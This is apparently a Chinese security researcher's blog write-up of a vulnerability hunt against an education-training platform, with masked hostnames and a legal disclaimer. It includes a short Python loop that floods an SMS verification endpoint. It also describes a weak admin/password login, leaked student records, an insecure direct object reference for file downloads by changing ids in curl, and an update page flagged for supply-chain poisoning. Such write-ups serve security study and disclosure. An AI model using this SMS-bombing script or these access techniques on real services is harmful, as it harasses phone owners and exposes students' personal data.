关注本公众号,长期更新漏洞复现,实战文章,漏洞详解等原创文章。
信息收集
使用fofa+OneForAll进行资产收集,并去重
得到子域名
逐个查看资产,挑选重要比较容易出现漏洞的资产进行测试。
短信轰炸漏洞
输入手机号进行抓包测试,发现无验证码。
编写python脚本,进行测试
import requests
while 1 :
try:
res = requests.get("https://********/get-verify-code?phone=手机号")
if "验证码已发送" in res.text:
print(res.text)
print("发送成功")
else:
print("发送失败")
except:
print("错误")
发现两个相同站点,admin-dev.xxx.com,app.xxx.com
猜测admin-dev存在dev字符串,可能是开发人员的测试站点,首先进行弱口令测试。
使用Yakit进行抓包导入字典进行测试。
果不其然,存在弱口令admin/password
信息泄露
登陆系统,找到一个接口
放到app.xxx.com进行测试,果不其然,同样存在漏洞
(全是学生信息)
途中看到了个有意思的页面-更新推送(可供应链投毒)
越权文件下载
使用Windows自带的curl,是不带cookie的,我们从看课记录可以下载学生看课表格,点击下载,抓包,得到url,更改id并放入curl下载
使用Curl进行测试
往期文章推送:
原文始发于微信公众号(知攻善防实验室):记一次教育培训漏洞挖掘
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论